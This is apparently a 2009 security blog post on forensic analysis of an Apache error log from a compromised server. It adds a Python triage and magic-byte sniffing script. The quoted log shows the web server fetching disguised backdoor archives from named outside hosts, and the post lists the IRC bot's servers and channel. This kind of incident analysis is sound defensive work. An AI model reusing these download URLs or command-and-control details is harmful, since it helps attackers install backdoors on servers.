Thursday, July 23, 2009

hacked server Apache log

Thanks to ezgranny420 for posting nearly 3500 lines of this Apache error log, which shows what appears to be a successful compromise of a web server. At line 3162 you'll notice the output of a successful wget of a file named mbot.jpg. The wget and tar output sits in between Apache's own [error] lines because the commands were run by the httpd process itself (presumably through a hole in a web application) and inherited its stderr, which is where wget prints its progress; interleaved shell output like this is the first thing to look for in an error log when you suspect command execution through the web server. mbot.jpg is not an image: the hosting server labelled it image/jpeg (`Length: unspecified [image/jpeg]`) purely from the .jpg extension, and the file is actually a gzip'd tarball containing what appears to be a backdoor that communicates over IRC. A Content-Type check would have passed it; only a look at the magic bytes catches it. A few lines later, `./start.sh: line 1: /#bin/bash: No such file or directory` shows that the dropped start script begins with `/#bin/bash` instead of `#!/bin/bash`, so bash treats that line as a command to run and fails on it, while the remaining lines of the script still execute. Later the same morning the same client (207.182.158.194) fetches a second archive, m.tar.gz, twice, and tar's "time stamp ... in the future" warnings show the archive's file times are ahead of the victim's clock. The repeated /w00tw00t.at.ISC.SANS.DFind:) requests further down are the signature of the DFind scanner and are unrelated background noise. For the curious, a quick examination of the tarball shows the following interesting servers and channels:

SERVER eu.undernet.org 6667
SERVER us.undernet.org 7000
SERVER 161.53.178.240 6667

CHANNEL #wh-ro
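The two checks described above, as an added example that is not code from the original post: first, separate the lines that are in Apache's own format from the "foreign" lines written by child processes and pull the URL and declared Content-Type out of each wget banner; second, identify the fetched file by its magic bytes rather than the server's label, and if it is a gzip'd tar, list its members and grep them for SERVER/CHANNEL directives. The log excerpt is a constructed slice of the paste, and the tarball built by `build_fake_mbot_jpg()` is a stand-in for mbot.jpg, not the real file; the member names `.m/bot.conf` and `.m/start.sh` and the config layout are assumptions, with the SERVER/CHANNEL values taken from the post.

```python
"""Triage an Apache error log that carries interleaved shell output, then
sniff the downloaded "image". Added example, not code from the original post."""
import io
import re
import tarfile

# Constructed slice of the pasted error log (URLs and IPs as in the paste).
SAMPLE_LOG = """\
[Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
--03:08:12--  http://members.lycos.co.uk/carbalano/mbot.jpg
Resolving members.lycos.co.uk... 213.131.252.251
HTTP request sent, awaiting response... 200 OK
Length: unspecified [image/jpeg]
Saving to: `mbot.jpg'
./start.sh: line 1: /#bin/bash: No such file or directory
[Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
--05:40:43--  http://w.ftp.sh/images/db/m.tar.gz
Length: 142538 (139K) [application/x-gzip]
tar: .m/start.sh: time stamp 2009-07-09 05:41:06 is 21 s in the future
[Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
"""

# Apache 2.2 error-log prefix: "[Thu Jul 09 03:05:22 2009] [error] ..."
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} \d\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# wget banner and "Length:" line as wget 1.x prints them to stderr
WGET_URL = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
WGET_TYPE = re.compile(r"^Length: .*\[([\w/+.-]+)\]$")
# Bot config directives of the kind quoted in the post
IRC_DIRECTIVE = re.compile(rb"^(SERVER|CHANNEL)\s+(\S+)(?:[ \t]+(\d+))?", re.M)


def triage_error_log(text):
    """Return (foreign_lines, downloads).

    foreign_lines: every line that is not in Apache's format. Those came from
    a child process that inherited httpd's stderr (wget, tar, sh), which is the
    trace a command run through the web server leaves behind.
    downloads: (url, declared_content_type) for each wget banner seen.
    """
    foreign, downloads = [], []
    for line in text.splitlines():
        if APACHE_LINE.match(line):
            continue
        foreign.append(line)
        m = WGET_URL.match(line)
        if m:
            downloads.append([m.group(1), None])
            continue
        m = WGET_TYPE.match(line)
        if m and downloads and downloads[-1][1] is None:
            downloads[-1][1] = m.group(1)
    return foreign, [tuple(d) for d in downloads]


def sniff(data):
    """Identify the payload by magic bytes, not by the server's Content-Type."""
    if data[:2] == b"\xff\xd8":
        return "image/jpeg"
    if data[:2] == b"\x1f\x8b":
        return "application/x-gzip"
    return "unknown"


def inspect_download(data, declared_type):
    """Compare declared vs. actual type; for a gzip'd tar, list the members
    and pull IRC SERVER/CHANNEL directives out of every regular file."""
    actual = sniff(data)
    report = {"declared": declared_type, "actual": actual,
              "mismatch": actual != declared_type, "members": [], "irc": []}
    if actual == "application/x-gzip":
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
            for member in tar.getmembers():
                report["members"].append(member.name)
                if not member.isfile():
                    continue
                body = tar.extractfile(member).read()
                for m in IRC_DIRECTIVE.finditer(body):
                    report["irc"].append(
                        " ".join(g.decode() for g in m.groups() if g))
    return report


def build_fake_mbot_jpg():
    """Constructed stand-in for mbot.jpg (assumption, not the real file): a
    gzip'd tar, so it starts with 1f 8b, holding a bot config with the
    SERVER/CHANNEL values quoted in the post and a start.sh whose first line
    is the broken '/#bin/bash' seen in the log."""
    files = {
        ".m/bot.conf": b"SERVER eu.undernet.org 6667\nSERVER us.undernet.org 7000\n"
                       b"SERVER 161.53.178.240 6667\nCHANNEL #wh-ro\n",
        ".m/start.sh": b"/#bin/bash\n./1\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    foreign, downloads = triage_error_log(SAMPLE_LOG)
    print("foreign (non-Apache) lines:", len(foreign))
    for url, ctype in downloads:
        print("download:", url, "declared as", ctype)
    print(inspect_download(build_fake_mbot_jpg(), "image/jpeg"))
```

Run against a real log, `triage_error_log` should be fed the whole file; anything it reports as foreign deserves a look, and the declared type from the wget banner is only useful as a contrast with what `sniff` says about the bytes actually on disk.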


Posted by ezgranny420 on Wed 22 Jul 21:45
  1. [Tue Apr 28 20:21:44 2009] [notice] SELinux policy enabled; httpd running as context root:system_r:httpd_t
  2. [Tue Apr 28 20:21:44 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  3. [Tue Apr 28 20:21:45 2009] [notice] Digest: generating secret for digest authentication ...
  4. [Tue Apr 28 20:21:45 2009] [notice] Digest: done
  5. [Tue Apr 28 20:21:45 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
  6. [Tue Apr 28 20:21:45 2009] [notice] Apache configured -- resuming normal operations
  7. [Tue Apr 28 20:24:32 2009] [notice] caught SIGTERM, shutting down
  8. [Tue Apr 28 20:26:55 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  9. [Tue Apr 28 20:26:56 2009] [notice] Digest: generating secret for digest authentication ...
  10. [Tue Apr 28 20:26:56 2009] [notice] Digest: done
  11. [Tue Apr 28 20:26:57 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
  12. [Tue Apr 28 20:26:57 2009] [notice] Apache configured -- resuming normal operations
  13. [Tue Apr 28 22:00:01 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  14. [Tue Apr 28 22:00:13 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  15. [Tue Apr 28 22:13:14 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  16. [Tue Apr 28 22:27:44 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  17. [Tue Apr 28 22:34:05 2009] [notice] caught SIGTERM, shutting down
skip forward to line 3159...
  3159. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3160. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3161. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3162. --03:08:12--  http://members.lycos.co.uk/carbalano/mbot.jpg
  3163. Resolving members.lycos.co.uk... 213.131.252.251
  3164. Connecting to members.lycos.co.uk|213.131.252.251|:80... connected.
  3165. HTTP request sent, awaiting response... 200 OK
  3166. Length: unspecified [image/jpeg]
  3167. Saving to: `mbot.jpg'
  3168.  
  3169.     0K .......... .......... .......... .......... .......... 94.0K
  3170.    50K .......... .......... .......... .......... ..........  337K
  3171.   100K .......... .......... .......... .......... .           316K=0.8s
  3172.  
  3173. 03:08:14 (174 KB/s) - `mbot.jpg' saved [144693]
  3174.  
  3175. ./start.sh: line 1: /#bin/bash: No such file or directory
  3176. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3177. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3178. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3179. --05:40:43--  http://w.ftp.sh/images/db/m.tar.gz
  3180. Resolving w.ftp.sh... 125.206.123.67
  3181. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
  3182. HTTP request sent, awaiting response... 200 OK
  3183. Length: 142538 (139K) [application/x-gzip]
  3184. Saving to: `m.tar.gz'
  3185.  
  3186.     0K .......... .......... .......... .......... .......... 35% 78.1K 1s
  3187.    50K .......... .......... .......... .......... .......... 71%  291K 0s
  3188.   100K .......... .......... .......... .........            100% 1.13M=0.8s
  3189.  
  3190. 05:40:45 (164 KB/s) - `m.tar.gz' saved [142538/142538]
  3191.  
  3192. tar: .m/start.sh: time stamp 2009-07-09 05:41:06 is 21 s in the future
  3193. tar: .m/1: time stamp 2009-07-09 05:42:04 is 79 s in the future
  3194. tar: .m: time stamp 2009-07-09 05:49:06 is 501 s in the future
  3195. --05:41:19--  http://w.ftp.sh/images/db/m.tar.gz
  3196. Resolving w.ftp.sh... 125.206.123.67
  3197. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
  3198. HTTP request sent, awaiting response... 200 OK
  3199. Length: 142538 (139K) [application/x-gzip]
  3200. Saving to: `m.tar.gz'
  3201.  
  3202.     0K .......... .......... .......... .......... .......... 35% 75.2K 1s
  3203.    50K .......... .......... .......... .......... .......... 71%  288K 0s
  3204.   100K .......... .......... .......... .........            100% 1.13M=0.9s
  3205.  
  3206. 05:41:20 (160 KB/s) - `m.tar.gz' saved [142538/142538]
  3207.  
  3208. tar: .m/1: time stamp 2009-07-09 05:42:04 is 44 s in the future
  3209. tar: .m: time stamp 2009-07-09 05:49:06 is 466 s in the future
  3210. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3211. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3212. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3213. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3214. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3215. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3216. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3217. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3218. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  3219. [Thu Jul 09 21:22:08 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)


The paste: http://pastebin.com/m7122eed0